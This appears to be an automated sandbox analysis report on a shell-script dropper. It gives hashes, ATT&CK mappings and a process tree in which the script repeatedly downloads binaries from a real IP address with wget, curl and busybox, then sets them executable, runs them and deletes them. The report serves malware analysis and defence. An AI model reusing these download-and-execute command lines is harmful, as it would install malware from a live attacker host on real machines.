Analysis
- max time kernel: 24s
- max time network: 26s
- platform: debian-9_armhf
- resource: debian9-armhf-20240611-en
- resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 28/10/2024, 02:45
Tasks
- static1 (static task)
- behavioral1: sample 7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh, resource ubuntu1804-amd64-20240611-en
- behavioral2: sample 7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh, resource debian9-armhf-20240611-en
- behavioral3: sample 7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh, resource debian9-mipsbe-20240611-en
- behavioral4: sample 7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh, resource debian9-mipsel-20240611-en
General
- Target: 7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh
- Size: 10KB
- MD5: 213cb7829c8f2673d0e3a75ed6639e13
- SHA1: 3daec954fef9c3751e7ce17a5d90672ccaf98608
- SHA256: 7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17
- SHA512: b8be68bfce37af24db9820d6960f1a66a43e4822dff463d9d5a485644d38ba72c7556113c1f4884d0c87fbf4bf318833208844059dcbb8b998dc6cf8e29554c4
- SSDEEP: 192:UouKo0b2Oyw0Iz0sbES+ssW5dw/3vUfDp5dw/3jrS+sFfDzPo0b2Ov0Iz0sl:UoGw0Iz0sbES+ssW5dw/3m5dw/3nS+s/
Signatures

- File and Directory Permissions Modification (1 TTP, 20 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  Process: chmod. PIDs: 843, 873, 719, 779, 793, 805, 817, 837, 696, 757, 799, 745, 823, 867, 682, 811, 829, 849, 855, 861

- Executes dropped EXE (20 IoCs)
  Each IoC is a file under /tmp executed as a process of the same name (pid in parentheses):
  - /tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB (683)
  - /tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM (697)
  - /tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne (721)
  - /tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI (746)
  - /tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy (759)
  - /tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H (780)
  - /tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7 (794)
  - /tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn (800)
  - /tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7 (806)
  - /tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9 (812)
  - /tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7 (818)
  - /tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj (824)
  - /tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn (830)
  - /tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0 (838)
  - /tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj (844)
  - /tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn (850)
  - /tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9 (856)
  - /tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7 (862)
  - /tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0 (868)
  - /tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne (874)

- Checks CPU configuration (1 TTP, 20 IoCs)
  Checks CPU information which indicates whether the system is a virtual machine.
  File opened for reading: /proc/cpuinfo, by curl (20 occurrences).

- Reads runtime system information (40 IoCs)
  File opened for reading: /proc/self/auxv (20 occurrences) and /proc/sys/crypto/fips_enabled (20 occurrences), all by curl.

- System Network Configuration Discovery (1 TTP, 10 IoCs)
  Adversaries may gather information about the network configuration of a system.
  PIDs and processes: 827 curl, 846 wget, 847 curl, 826 wget, 828 busybox, 830 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn, 831 rm, 848 busybox, 850 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn, 851 rm

- Writes file to tmp directory (20 IoCs)
  Malware often drops required files in the /tmp directory.
  File opened for modification by curl (files marked "2 IoCs" appear twice in the report):
  - /tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9 (2 IoCs)
  - /tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7
  - /tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn (2 IoCs)
  - /tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj (2 IoCs)
  - /tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0 (2 IoCs)
  - /tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM
  - /tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne (2 IoCs)
  - /tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI
  - /tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn
  - /tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7 (2 IoCs)
  - /tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB
  - /tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy
  - /tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H
  - /tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7
Processes

Each entry gives the PID, the executable path and the command line. Signature hits are the same for every iteration of the loop, so they are stated once here rather than repeated per line: every curl process triggers Checks CPU configuration, Reads runtime system information and Writes file to tmp directory; every chmod process triggers File and Directory Permissions Modification; every /tmp/<name> process triggers Executes dropped EXE. System Network Configuration Discovery is flagged only on the lines marked [SNCD] below.

- PID 649: /tmp/7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh, cmdline: /tmp/7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh
  - PID 652: /bin/rm, cmdline: /bin/rm bins.sh
  - PID 656: /usr/bin/wget, cmdline: wget http://87.120.84.230/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB
  - PID 672: /usr/bin/curl, cmdline: curl -O http://87.120.84.230/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB
  - PID 680: /bin/busybox, cmdline: /bin/busybox wget http://87.120.84.230/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB
  - PID 682: /bin/chmod, cmdline: chmod 777 r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB
  - PID 683: /tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB, cmdline: ./r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB
  - PID 684: /bin/rm, cmdline: rm r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB
  - PID 685: /usr/bin/wget, cmdline: wget http://87.120.84.230/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM
  - PID 686: /usr/bin/curl, cmdline: curl -O http://87.120.84.230/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM
  - PID 690: /bin/busybox, cmdline: /bin/busybox wget http://87.120.84.230/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM
  - PID 696: /bin/chmod, cmdline: chmod 777 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM
  - PID 697: /tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM, cmdline: ./9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM
  - PID 698: /bin/rm, cmdline: rm 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM
  - PID 699: /usr/bin/wget, cmdline: wget http://87.120.84.230/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne
  - PID 707: /usr/bin/curl, cmdline: curl -O http://87.120.84.230/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne
  - PID 714: /bin/busybox, cmdline: /bin/busybox wget http://87.120.84.230/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne
  - PID 719: /bin/chmod, cmdline: chmod 777 eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne
  - PID 721: /tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne, cmdline: ./eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne
  - PID 722: /bin/rm, cmdline: rm eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne
  - PID 723: /usr/bin/wget, cmdline: wget http://87.120.84.230/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI
  - PID 735: /usr/bin/curl, cmdline: curl -O http://87.120.84.230/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI
  - PID 743: /bin/busybox, cmdline: /bin/busybox wget http://87.120.84.230/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI
  - PID 745: /bin/chmod, cmdline: chmod 777 O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI
  - PID 746: /tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI, cmdline: ./O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI
  - PID 747: /bin/rm, cmdline: rm O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI
  - PID 748: /usr/bin/wget, cmdline: wget http://87.120.84.230/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy
  - PID 749: /usr/bin/curl, cmdline: curl -O http://87.120.84.230/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy
  - PID 752: /bin/busybox, cmdline: /bin/busybox wget http://87.120.84.230/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy
  - PID 757: /bin/chmod, cmdline: chmod 777 eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy
  - PID 759: /tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy, cmdline: ./eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy
  - PID 760: /bin/rm, cmdline: rm eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy
  - PID 762: /usr/bin/wget, cmdline: wget http://87.120.84.230/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H
  - PID 767: /usr/bin/curl, cmdline: curl -O http://87.120.84.230/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H
  - PID 774: /bin/busybox, cmdline: /bin/busybox wget http://87.120.84.230/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H
  - PID 779: /bin/chmod, cmdline: chmod 777 QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H
  - PID 780: /tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H, cmdline: ./QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H
  - PID 782: /bin/rm, cmdline: rm QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H
  - PID 783: /usr/bin/wget, cmdline: wget http://87.120.84.230/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7
  - PID 787: /usr/bin/curl, cmdline: curl -O http://87.120.84.230/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7
  - PID 792: /bin/busybox, cmdline: /bin/busybox wget http://87.120.84.230/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7
  - PID 793: /bin/chmod, cmdline: chmod 777 rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7
  - PID 794: /tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7, cmdline: ./rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7
  - PID 795: /bin/rm, cmdline: rm rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7
  - PID 796: /usr/bin/wget, cmdline: wget http://87.120.84.230/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn
  - PID 797: /usr/bin/curl, cmdline: curl -O http://87.120.84.230/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn
  - PID 798: /bin/busybox, cmdline: /bin/busybox wget http://87.120.84.230/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn
  - PID 799: /bin/chmod, cmdline: chmod 777 GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn
  - PID 800: /tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn, cmdline: ./GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn
  - PID 801: /bin/rm, cmdline: rm GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn
  - PID 802: /usr/bin/wget, cmdline: wget http://87.120.84.230/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7
  - PID 803: /usr/bin/curl, cmdline: curl -O http://87.120.84.230/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7
  - PID 804: /bin/busybox, cmdline: /bin/busybox wget http://87.120.84.230/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7
  - PID 805: /bin/chmod, cmdline: chmod 777 MZGoABrnYnFu8Xp27oQs69simaihhOZfI7
  - PID 806: /tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7, cmdline: ./MZGoABrnYnFu8Xp27oQs69simaihhOZfI7
  - PID 807: /bin/rm, cmdline: rm MZGoABrnYnFu8Xp27oQs69simaihhOZfI7
  - PID 808: /usr/bin/wget, cmdline: wget http://87.120.84.230/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9
  - PID 809: /usr/bin/curl, cmdline: curl -O http://87.120.84.230/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9
  - PID 810: /bin/busybox, cmdline: /bin/busybox wget http://87.120.84.230/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9
  - PID 811: /bin/chmod, cmdline: chmod 777 LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9
  - PID 812: /tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9, cmdline: ./LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9
  - PID 813: /bin/rm, cmdline: rm LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9
  - PID 814: /usr/bin/wget, cmdline: wget http://87.120.84.230/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7
  - PID 815: /usr/bin/curl, cmdline: curl -O http://87.120.84.230/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7
  - PID 816: /bin/busybox, cmdline: /bin/busybox wget http://87.120.84.230/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7
  - PID 817: /bin/chmod, cmdline: chmod 777 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7
  - PID 818: /tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7, cmdline: ./1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7
  - PID 819: /bin/rm, cmdline: rm 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7
  - PID 820: /usr/bin/wget, cmdline: wget http://87.120.84.230/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj
  - PID 821: /usr/bin/curl, cmdline: curl -O http://87.120.84.230/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj
  - PID 822: /bin/busybox, cmdline: /bin/busybox wget http://87.120.84.230/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj
  - PID 823: /bin/chmod, cmdline: chmod 777 zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj
  - PID 824: /tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj, cmdline: ./zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj
  - PID 825: /bin/rm, cmdline: rm zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj
  - PID 826: /usr/bin/wget, cmdline: wget http://87.120.84.230/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn [SNCD]
  - PID 827: /usr/bin/curl, cmdline: curl -O http://87.120.84.230/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn [SNCD]
  - PID 828: /bin/busybox, cmdline: /bin/busybox wget http://87.120.84.230/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn [SNCD]
  - PID 829: /bin/chmod, cmdline: chmod 777 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn
  - PID 830: /tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn, cmdline: ./TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn [SNCD]
  - PID 831: /bin/rm, cmdline: rm TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn [SNCD]
  - PID 832: /usr/bin/wget, cmdline: wget http://87.120.84.230/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0
  - PID 834: /usr/bin/curl, cmdline: curl -O http://87.120.84.230/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0
  - PID 836: /bin/busybox, cmdline: /bin/busybox wget http://87.120.84.230/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0
  - PID 837: /bin/chmod, cmdline: chmod 777 GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0
  - PID 838: /tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0, cmdline: ./GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0
  - PID 839: /bin/rm, cmdline: rm GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0
  - PID 840: /usr/bin/wget, cmdline: wget http://87.120.84.230/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj
  - PID 841: /usr/bin/curl, cmdline: curl -O http://87.120.84.230/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj
  - PID 842: /bin/busybox, cmdline: /bin/busybox wget http://87.120.84.230/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj
  - PID 843: /bin/chmod, cmdline: chmod 777 zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj
  - PID 844: /tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj, cmdline: ./zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj
  - PID 845: /bin/rm, cmdline: rm zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj
  - PID 846: /usr/bin/wget, cmdline: wget http://87.120.84.230/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn [SNCD]
  - PID 847: /usr/bin/curl, cmdline: curl -O http://87.120.84.230/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn [SNCD]
  - PID 848: /bin/busybox, cmdline: /bin/busybox wget http://87.120.84.230/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn [SNCD]
  - PID 849: /bin/chmod, cmdline: chmod 777 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn
  - PID 850: /tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn, cmdline: ./TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn [SNCD]
  - PID 851: /bin/rm, cmdline: rm TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn [SNCD]
  - PID 852: /usr/bin/wget, cmdline: wget http://87.120.84.230/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9
  - PID 853: /usr/bin/curl, cmdline: curl -O http://87.120.84.230/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9
  - PID 854: /bin/busybox, cmdline: /bin/busybox wget http://87.120.84.230/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9
  - PID 855: /bin/chmod, cmdline: chmod 777 LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9
  - PID 856: /tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9, cmdline: ./LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9
  - PID 857: /bin/rm, cmdline: rm LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9
  - PID 858: /usr/bin/wget, cmdline: wget http://87.120.84.230/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7
  - PID 859: /usr/bin/curl, cmdline: curl -O http://87.120.84.230/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7
  - PID 860: /bin/busybox, cmdline: /bin/busybox wget http://87.120.84.230/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7
  - PID 861: /bin/chmod, cmdline: chmod 777 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7
  - PID 862: /tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7, cmdline: ./1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7
  - PID 863: /bin/rm, cmdline: rm 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7
  - PID 864: /usr/bin/wget, cmdline: wget http://87.120.84.230/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0
  - PID 865: /usr/bin/curl, cmdline: curl -O http://87.120.84.230/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0
  - PID 866: /bin/busybox, cmdline: /bin/busybox wget http://87.120.84.230/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0
  - PID 867: /bin/chmod, cmdline: chmod 777 GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0
  - PID 868: /tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0, cmdline: ./GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0
  - PID 869: /bin/rm, cmdline: rm GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0
  - PID 870: /usr/bin/wget, cmdline: wget http://87.120.84.230/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne
  - PID 871: /usr/bin/curl, cmdline: curl -O http://87.120.84.230/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne
  - PID 872: /bin/busybox, cmdline: /bin/busybox wget http://87.120.84.230/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne
  - PID 873: /bin/chmod, cmdline: chmod 777 eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne
  - PID 874: /tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne, cmdline: ./eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne
  - PID 875: /bin/rm, cmdline: rm eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne
  - PID 876: /usr/bin/wget, cmdline: wget http://87.120.84.230/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB
MITRE ATT&CK Enterprise v15
- Defense Evasion
  - File and Directory Permissions Modification (1): Linux and Mac File and Directory Permissions Modification (1)
  - Virtualization/Sandbox Evasion (1): System Checks (1)
Downloads
- Filesize: 153B
- MD5: 998368d7c95ea4293237f2320546e440
- SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
- SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
- SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97